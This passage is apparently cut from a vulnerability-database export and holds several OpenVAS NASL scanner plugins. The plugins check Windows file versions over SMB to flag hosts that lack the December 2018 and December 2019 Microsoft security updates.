Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530702\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"inetcomm.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.19572\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Inetcomm.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.19572\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530681", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815867", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815867", "type": "openvas", 
"title": "Microsoft Windows Multiple Vulnerabilities (KB4530681)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815867\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1465\", \"CVE-2019-1466\", \"CVE-2019-1488\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1484\", \"CVE-2019-1458\",\n \"CVE-2019-1485\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530681)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530681\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 
vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530681\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Pcadm.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.10240.0\", 
test_version2:\"10.0.10240.18426\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Pcadm.dll\",\n file_version:sysVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18426\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530689", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815862", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815862", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530689)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815862\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1472\", \"CVE-2019-1474\", \"CVE-2019-1476\", \"CVE-2019-1484\",\n \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 09:28:10 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530689)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530689\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Remote Desktop Protocol (RDP) improperly handles connection requests.\n\n - Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to crash host server, execute code with elevated permissions, obtain information\n to further compromise the user's system, escalate privileges and bypass security\n 
restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530689\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32full.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_in_range(version:sysVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3383\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Gdi32full.dll\",\n file_version:sysVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3383\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:05:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471323", 
"modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814614", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471323)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471323)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814614\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8540\", \"CVE-2018-8599\",\n \"CVE-2018-8611\", \"CVE-2018-8617\", \"CVE-2018-8619\", \"CVE-2018-8625\",\n \"CVE-2018-8629\", \"CVE-2018-8631\", \"CVE-2018-8634\", \"CVE-2018-8639\",\n \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\", \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 
(Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:39:09 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471323)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471323\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer VBScript execution policy does not properly restrict\n VBScript under specific conditions.\n\n - Scripting engine improperly handles objects in memory in Internet Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - VBScript engine improperly handles objects in memory.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, gain elevated privileges, obtain sensitive\n information and take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471323\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.18062\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.18062\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1481", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1480", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530734", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815737", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815737", "type": "openvas", "title": "Microsoft Windows Multiple 
Vulnerabilities (KB4530734)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815737\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1474\", \"CVE-2019-1478\", \"CVE-2019-1480\", \"CVE-2019-1481\",\n \"CVE-2019-1484\", \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 14:30:14 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530734)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530734\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 
vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Win32k component fails to properly handle objects in memory.\n\n - win32k component improperly provides kernel information.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows improperly handles COM object creation.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n execute arbitrary code, elevate privileges, gain access to sensitive information,\n cause denial of service and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4530734/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntdll.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_is_less(version:dllVer, test_version:\"6.1.7601.24540\")) {\n report = 
report_fixed_ver(file_checked:sysPath + \"\\Ntdll.dll\",\n file_version:dllVer, vulnerable_range:\"Less than 6.1.7601.24540\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:29:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8612", "CVE-2018-8618", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8624", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8517", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471321", "modified": "2019-12-20T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814613", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471321)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471321)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814613\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8517\", \"CVE-2018-8540\",\n \"CVE-2018-8599\", \"CVE-2018-8611\", \"CVE-2018-8612\", \"CVE-2018-8617\",\n \"CVE-2018-8618\", \"CVE-2018-8619\", \"CVE-2018-8624\", \"CVE-2018-8625\",\n \"CVE-2018-8626\", \"CVE-2018-8629\", \"CVE-2018-8631\", \"CVE-2018-8634\",\n \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 10:13:23 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471321)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471321\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Connected User Experiences and Telemetry Service fails to validate\n certain function values.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Internet Explorer VBScript execution policy does not properly restrict\n VBScript under specific conditions.\n\n - Windows GDI component 
improperly discloses the contents of its memory.\n\n - Scripting engine handles objects in memory in Internet Explorer.\n\n - VBScript engine improperly handles objects in memory.\n\n - Microsoft text-to-speech fails to properly handle objects in the memory.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Windows Domain Name System (DNS) servers fail to properly handle requests.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Diagnostics Hub Standard Collector Service improperly impersonates\n certain file operations.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, obtain sensitive information, deny\n dependent security feature functionality, gain elevated privileges, cause a\n denial of service and take control of the affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471321\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2664\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2664\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:05:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8634", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8612", "CVE-2018-8618", "CVE-2018-8540", "CVE-2018-8617", "CVE-2018-8624", "CVE-2018-8583", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8629", "CVE-2018-8639", "CVE-2018-8599", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8517", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471327", "modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814612", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310814612", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471327)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471327)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814612\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8517\", \"CVE-2018-8540\",\n \"CVE-2018-8599\", \"CVE-2018-8611\", \"CVE-2018-8612\", \"CVE-2018-8617\",\n \"CVE-2018-8618\", \"CVE-2018-8619\", \"CVE-2018-8624\", \"CVE-2018-8625\",\n \"CVE-2018-8629\", \"CVE-2018-8631\", \"CVE-2018-8634\", \"CVE-2018-8639\",\n \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8583\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 
